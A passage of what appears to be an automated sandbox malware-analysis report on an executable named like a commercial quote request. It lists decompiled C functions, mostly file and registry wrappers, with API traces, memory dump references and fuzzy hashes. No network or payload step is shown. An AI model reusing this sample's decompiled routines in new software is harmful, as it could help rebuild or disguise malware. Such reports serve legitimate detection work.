                                                                                                                                                                                  • Instruction Fuzzy Hash: 19E08632644111ABD320A7749D0493B72A89E85740302483EF506F2181DB38DC21A669
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 004059A2 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 68%
                                                                                                                                                                                  			E004059A2(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, "true", 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                                                                                                                                                  0x004059a6
                                                                                                                                                                                  0x004059b3
                                                                                                                                                                                  0x004059c8
                                                                                                                                                                                  0x004059ce

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\RFQINL0607_Commerical_list.exe,80000000,00000003), ref: 004059A6
                                                                                                                                                                                  • CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 004059C8
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11499590101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11499558014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499653111.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: File$AttributesCreate
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 415043291-0
                                                                                                                                                                                  • Opcode ID: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
                                                                                                                                                                                  • Instruction ID: 2848333a8a5b20597e43067d17cc290ce391feab13c7f73248cb22e1b8f9cacf
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5CD09E31658301AFEF098F20DD16F2EBAA2EB84B01F10962CBA82950E0D6755C159B26
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 0040548B Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                  			E0040548B(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                                                                                                                                                                  0x00405491
                                                                                                                                                                                  0x00405499
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x0040549f
                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • CreateDirectoryA.KERNELBASE(?,00000000,00403102,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00405491
                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0040549F
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11499590101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11499558014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499653111.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1375471231-0
                                                                                                                                                                                  • Opcode ID: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
                                                                                                                                                                                  • Instruction ID: a4c09d903a68db5e1e5a8a61abb96ed160ccf8e5b17bdb7d1f8a9ed05c9a91ae
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9FC04C30629541EADA515B209E097577E54AB50742F2045756606E10E0D6349551D92E
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 0040255C Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                  			E0040255C(intOrPtr __ebx, void* __edi, void* __esi) {
				intOrPtr _t26;
				void* _t35;
				void* _t38;

				 *((intOrPtr*)(_t35 - 8)) = __ebx;
				_t26 = E00402A1D(2);
				_t38 = _t26 - 1;
				 *((intOrPtr*)(_t35 - 0xc)) = _t26;
				if(_t38 < 0) {
					L24:
					 *0x42e488 =  *0x42e488 +  *((intOrPtr*)(_t35 - 4));
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *((intOrPtr*)(__ebp - 0xc)) = 0x3ff;
					}
					if( *__esi == __bl) {
						L21:
						__esi =  *((intOrPtr*)(__ebp - 8));
						goto L22;
					} else {
						 *((char*)(__ebp + 0xb)) = __bl;
						 *(__ebp - 0x30) = E00405CA6(__ecx, __esi);
						if( *((intOrPtr*)(__ebp - 0xc)) <= __ebx) {
							goto L21;
						} else {
							__esi =  *((intOrPtr*)(__ebp - 8));
							while(1) {
								__eax = __ebp - 0xd;
								__eax = E00405A1A( *(__ebp - 0x30), __ebp - 0xd, "true"); // executed
								if(__eax == 0) {
									break;
								}
								if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx) {
									 *(__ebp - 0xd) & 0x000000ff = E00405C8D(__edi,  *(__ebp - 0xd) & 0x000000ff);
								} else {
									if( *((char*)(__ebp + 0xb)) == 0xd ||  *((char*)(__ebp + 0xb)) == 0xa) {
										__al =  *(__ebp - 0xd);
										if( *((intOrPtr*)(__ebp + 0xb)) == __al || __al != 0xd && __al != 0xa) {
											__eax = SetFilePointer( *(__ebp - 0x30), 0xffffffff, __ebx, "true");
										} else {
											 *((char*)(__esi + __edi)) = __al;
											__esi = __esi + 1;
										}
										break;
									} else {
										__al =  *(__ebp - 0xd);
										 *((char*)(__esi + __edi)) = __al;
										__esi = __esi + 1;
										 *((char*)(__ebp + 0xb)) = __al;
										if(__al == __bl) {
											break;
										} else {
											if(__esi <  *((intOrPtr*)(__ebp - 0xc))) {
												continue;
											} else {
												break;
											}
										}
									}
								}
								goto L25;
							}
							L22:
							 *((char*)(__esi + __edi)) = __bl;
							if(_t38 == 0) {
								 *((intOrPtr*)(_t35 - 4)) = 1;
							}
							goto L24;
						}
					}
				}
				L25:
				return 0;
			}






                                                                                                                                                                                  0x0040255e
                                                                                                                                                                                  0x00402561
                                                                                                                                                                                  0x00402566
                                                                                                                                                                                  0x00402569
                                                                                                                                                                                  0x0040256c
                                                                                                                                                                                  0x004028cf
                                                                                                                                                                                  0x004028d2
                                                                                                                                                                                  0x00402572
                                                                                                                                                                                  0x00402572
                                                                                                                                                                                  0x00402579
                                                                                                                                                                                  0x0040257b
                                                                                                                                                                                  0x0040257b
                                                                                                                                                                                  0x00402580
                                                                                                                                                                                  0x00402608
                                                                                                                                                                                  0x00402608
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00402586
                                                                                                                                                                                  0x00402587
                                                                                                                                                                                  0x00402592
                                                                                                                                                                                  0x00402595
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00402597
                                                                                                                                                                                  0x00402597
                                                                                                                                                                                  0x0040259a
                                                                                                                                                                                  0x0040259a
                                                                                                                                                                                  0x004025a3
                                                                                                                                                                                  0x004025aa
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x004025af
                                                                                                                                                                                  0x004025d8
                                                                                                                                                                                  0x004025b1
                                                                                                                                                                                  0x004025b5
                                                                                                                                                                                  0x004025e2
                                                                                                                                                                                  0x004025e8
                                                                                                                                                                                  0x00402600
                                                                                                                                                                                  0x004025f2
                                                                                                                                                                                  0x004025f2
                                                                                                                                                                                  0x004025f5
                                                                                                                                                                                  0x004025f5
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x004025bd
                                                                                                                                                                                  0x004025bd
                                                                                                                                                                                  0x004025c0
                                                                                                                                                                                  0x004025c3
                                                                                                                                                                                  0x004025c6
                                                                                                                                                                                  0x004025c9
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x004025cb
                                                                                                                                                                                  0x004025ce
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x004025d0
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x004025d0
                                                                                                                                                                                  0x004025ce
                                                                                                                                                                                  0x004025c9
                                                                                                                                                                                  0x004025b5
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x004025af
                                                                                                                                                                                  0x0040260b
                                                                                                                                                                                  0x0040260b
                                                                                                                                                                                  0x004015a8
                                                                                                                                                                                  0x004026a6
                                                                                                                                                                                  0x004026a6
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x004015a8
                                                                                                                                                                                  0x00402595
                                                                                                                                                                                  0x00402580
                                                                                                                                                                                  0x004028d8
                                                                                                                                                                                  0x004028de

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11499590101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11499558014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499653111.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: wsprintf
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2111968516-0
                                                                                                                                                                                  • Opcode ID: 43e8526685af10c7a70099ac688fd15d9e428af537d247d71629121192087908
                                                                                                                                                                                  • Instruction ID: 63d8cf605c3d3826413663d3d9f5e538fe035c7b3cf6c49c1bd82217496ef320
                                                                                                                                                                                  • Opcode Fuzzy Hash: 43e8526685af10c7a70099ac688fd15d9e428af537d247d71629121192087908
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F210870C04299BEDF318B584A885AFBF749F11308F1480BBE891B62D1C1BD8A81EF1D
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00402616 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 44%
                                                                                                                                                                                  			E00402616(void* __eflags) {
				long _t6;
				long _t8;
				LONG* _t10;
				void* _t12;
				void* _t15;
				void* _t17;

				_push(ds);
				if(__eflags != 0) {
					_t6 = E00402A1D(2);
					_t8 = SetFilePointer(E00405CA6(_t12, _t15), _t6, _t10,  *(_t17 - 0x1c)); // executed
					if( *((intOrPtr*)(_t17 - 0x24)) >= _t10) {
						_push(_t8);
						E00405C8D();
					}
				}
				 *0x42e488 =  *0x42e488 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}









                                                                                                                                                                                  0x00402616
                                                                                                                                                                                  0x00402617
                                                                                                                                                                                  0x00402623
                                                                                                                                                                                  0x00402630
                                                                                                                                                                                  0x00402639
                                                                                                                                                                                  0x00402875
                                                                                                                                                                                  0x00402877
                                                                                                                                                                                  0x00402877
                                                                                                                                                                                  0x00402639
                                                                                                                                                                                  0x004028d2
                                                                                                                                                                                  0x004028de

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 00402630
                                                                                                                                                                                    • Part of subcall function 00405C8D: wsprintfA.USER32 ref: 00405C9A
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11499590101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11499558014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499653111.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FilePointerwsprintf
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 327478801-0
                                                                                                                                                                                  • Opcode ID: 764acf2aeb277f9e06bdeffef5fa042cff7d54f69f19df9b32342fbbe382f709
                                                                                                                                                                                  • Instruction ID: a9483199a9c1f24fdd03f346660dbac79c1e67f8a05fdc412783a5a7fba403a9
                                                                                                                                                                                  • Opcode Fuzzy Hash: 764acf2aeb277f9e06bdeffef5fa042cff7d54f69f19df9b32342fbbe382f709
                                                                                                                                                                                  • Instruction Fuzzy Hash: BCE04F76A04100ABF701FBA6AE49DBF776ADB50318B60453BF601F10C1D67D89069A3E
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00402B44 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 79%
                                                                                                                                                                                  			E00402B44(void* __eflags, void* _a4) {
				char* _t8;
				intOrPtr _t9;
				signed int _t11;

				_t8 = E00402A3A(0x22);
				_t9 =  *0x40a810; // 0x348fd5c
				_t3 = _t9 + 4; // 0x135
				_t11 = RegOpenKeyExA(E00402B2F( *_t3), _t8, 0,  *0x42e4b0 | _a4,  &_a4); // executed
				asm("sbb eax, eax");
				return  !( ~_t11) & _a4;
			}






                                                                                                                                                                                  0x00402b58
                                                                                                                                                                                  0x00402b5e
                                                                                                                                                                                  0x00402b63
                                                                                                                                                                                  0x00402b6c
                                                                                                                                                                                  0x00402b74
                                                                                                                                                                                  0x00402b7c

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • RegOpenKeyExA.KERNELBASE(00000000,00000135,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11499590101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11499558014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499653111.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Open
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 71445658-0
                                                                                                                                                                                  • Opcode ID: 08f437b6b575c0d1784f99ac72875e6d7de6160551833be987b148fec970e4e7
                                                                                                                                                                                  • Instruction ID: d438f0a484ed9c160f568b140fbb6a6f0821f4cba08bd088e2e240e06c4f75a3
                                                                                                                                                                                  • Opcode Fuzzy Hash: 08f437b6b575c0d1784f99ac72875e6d7de6160551833be987b148fec970e4e7
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5FE04676240208AFDB00EFA9ED4AFA637ECBB18705F008425B609E60A1C678E5508B69
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00405A49 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                  			E00405A49(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                                                                                                                                  0x00405a4d
                                                                                                                                                                                  0x00405a5d
                                                                                                                                                                                  0x00405a65
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00405a6c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00405a6e

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040307A,00000000,00414420,000000FF,00414420,000000FF,000000FF,00000004,00000000), ref: 00405A5D
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11499590101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11499558014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499653111.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FileWrite
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3934441357-0
                                                                                                                                                                                  • Opcode ID: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                                                                                                                                                  • Instruction ID: 4baa6dbb94b5aed14ede1987b2b874979685841cdf923a54f3be7db8892ddb6c
                                                                                                                                                                                  • Opcode Fuzzy Hash: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                                                                                                                                                  • Instruction Fuzzy Hash: 65E0EC3265425EAFDF109E659C40EEB7BACEB053A0F008933F925E2150D231E821DFA9
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00405A1A Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                  			E00405A1A(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                                                                                                                                  0x00405a1e
                                                                                                                                                                                  0x00405a2e
                                                                                                                                                                                  0x00405a36
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00405a3d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00405a3f

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004030C4,00000000,00000000,00402EEE,000000FF,00000004,00000000,00000000,00000000), ref: 00405A2E
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11499590101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11499558014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499653111.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FileRead
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2738559852-0
                                                                                                                                                                                  • Opcode ID: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
                                                                                                                                                                                  • Instruction ID: b949637607fe9c5fc006a161b6664aa16a088e5f06d71f7b71a40b2ab1c7b417
